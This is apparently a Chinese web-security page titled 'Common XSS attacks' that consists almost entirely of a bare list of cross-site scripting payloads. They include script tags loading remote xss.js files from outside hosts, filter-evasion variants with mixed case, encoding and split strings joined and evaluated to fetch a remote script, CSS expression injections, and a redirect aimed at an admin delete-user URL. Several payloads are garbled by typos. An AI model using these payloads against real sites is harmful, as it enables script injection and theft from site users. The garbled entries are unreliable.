1. 程式人生 > >Web安全(一):常見的XSS攻擊

Web安全(一):常見的XSS攻擊

<SCRIPT SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=jaVaScRipt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&$##54SA$&&%ASA356....>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')">

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<scipt'</script>
<script>z=z+'src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//</SCRIPT>
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
<IMG SRC="javascript:alert('XSS')"
<iframe scr=http://3w.org/XSS/html<
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT SRC="javascript:alert('XSS')">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<LINE REL="stylesheet" HREF="javascript:alert('XSS');">
<LINE REL="stylesheet" HREF="http://3w.org/xss.css">
<STYLE>li {list-style-image:url("javascript:alert('XSS')");}</STYELE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
http://www.tools.net/viewthread.php?actoin=printable&tid = 152673/6
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image:url(javascript:alert('XSS'))">
<DIV STYLE="width: expression_r(alert('XSS'));">
<IMG STYLE="xss: expression_r(alert('XSS'))">
<XSS STYLE="xss: expression_r(alert('XSS'))">
<STYLE>XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE></SYTLE>
type="text/css">BODY{background:url="javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<IMG SRC=http://www.XXX.com/a.php?a=b">
Redirect 302 /a.jpg http://www.XX.com/admin.asp&deleteuser
<SCRIPT a=">" SRC="http://2w.org/xss.js"></SCRIPT>
<A HREF="http://127.0.0.1/">XSS</A>
<A HREF="http://3w.org">XSS</A>
<A HREF="http://3232235521">XSS</A>
<A HREF="http://0300.0250.0000.0001">XSS</A>
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
<A HREF="http://www.google.com">XSS</A>
<A HREF="javascript:document.location='http://www.google.com'">XSS</A>